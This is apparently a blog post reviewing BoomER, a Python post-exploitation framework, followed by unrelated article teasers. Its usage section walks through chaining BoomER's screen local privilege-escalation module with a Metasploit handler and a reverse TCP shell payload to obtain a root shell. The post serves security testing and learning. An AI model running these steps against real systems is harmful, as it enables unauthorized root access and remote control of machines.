BoomER | An Open Source Post-Exploitation Tool To Exploit Local Vulnerabilities

BoomER is a Command-line interface python open-source framework fully developed in Python 3.X for post-exploitation of targets with the objective to exploit local vulnerabilities on the big three OS’s (Windows/Linux/Mac). The tool allows for interaction with third-party software like Metasploit to chain attacks together. Installation 1 – Go to the Github Repository 2 – git clone https://github.com/Josue87/BoomER 2 – cd BoomER 3 – Install requirements depends on your system OS Since I’m using Kali I will sudo pip3 install -r linuxrequirements.txt Usage To explain the usage of BoomER in this example we use Metasploit and try to perform a local exploitation attack on Kali using normal user privileges 1 – We launch Metasploit with the command msfconsole or msfdb run 1.1 we type use exploit/multi/handler 1.2 set LHOSt {yourip} 1.3 set LPORT {yourport} 2 – we launch BoomER with the command python3 boomer.py 2.1 Loading Linux module and the payload load linux/elevation/screen_exploit put payload msf/linux/x64/shell_reverse_tcp 2.2 we set the same LHOST and LPORT we made on Metasploit in BoomER put lhost {yourip} put lport {yourport} 3 – We run exploit -j -z in Metasploit and run in BoomER 4 – and we get our root shell Pros – Fully Customized – Easy Syntax (Similar to MSF) Cons – MSF has Local Modules already – Not in active development I think BoomER is a powerful tool with a syntax that’s similar to Metasploit and works to exploit local vulnerabilities, they implemented many modules that work in all type of OS’s.

Comments

Post a Comment

Please Share Your Views

Popular posts from this blog

SSO — WSO2 API Manager and Keycloak Identity Manager

Image
In this article, we are going to see how to implement Single Sign-On (SSO) for WSO2 API Manager using Keycloak as a Federated Identity Provider. Also, we'll choose a deep-dive showing how debugging works with the WSO2 API Manager code to see what happens inside when it's configured with a third-party identity provider (i.e Keycloak in this example). High-Level Architecture This is what we are going to do in this tutorial. High-level architecture Software Needed Following softwares will be needed: WSO2 API Manager (2.6.0) Keycloak (6.0.1) Note : We aren’t getting to use WSO2 Identity Server as a middleman for this tutorial. The article is predicated on pure WSO2 API Manager 2.6.0 (all in one). Before We Start The tutorial will be divided into two parts. In the first part, I will explain how to install and configure Keycloak. In the second part, we will see how to install and configure the WSO2 API Manager. Before we start, let's modify the  /etc/hosts  file
Read more

Single Value Decomposition in Data Science

Image
Overview Singular Value Decomposition (SVD) is a common dimensionality reduction technique in data science We will discuss 5 must-know applications of SVD here and understand their role in data science We will also see three different ways of implementing SVD in Python   Introduction “Another day has passed, and I still haven’t used  y = mx + b. “ Sounds familiar? I often hear my school and college acquaintances complain that the algebra equations they spent so much time on are essentially useless in the real world. Well – I can assure you that’s simply not true. Especially if you want to carve out a career in data science. Linear algebra bridges the gap between theory and practical implementation of concepts. A healthy understanding of linear algebra opens doors to  machine learning  algorithms we thought were impossible to understand. And one such use of linear algebra is in Singular Value Decomposition (SVD) for dimensionality reduction. You must have come across SVD a lot in data s
Read more

Video Analysis: Creating Highlights Using Python

Image
Overview Build your own highlights package in Python using a simple approach That’s right – learn how automatic highlight generation works without using machine learning or deep learning! We will implement our own approach to automatic highlight generation using a full-length cricket match   Your Subconscious Mind Receives Each And Every Thought That You Have and Absolutely Accepts It As The Truth, Feeding it back into your Daily Reality. Introduction I’m a huge cricket fan. I’ve been hooked to the game since I can remember and it still fuels my day-to-day routine. I’m sure a lot of you reading this will be nodding your head! But ever since I started working full-time, keeping up with all the matches has been a tough nut to crack. I can only catch fleeting finishes to matches rather than the whole package. Or I have to follow along with text commentary – either way, it leaves me wanting more. So the data scientist in me decided to do something about this
Read more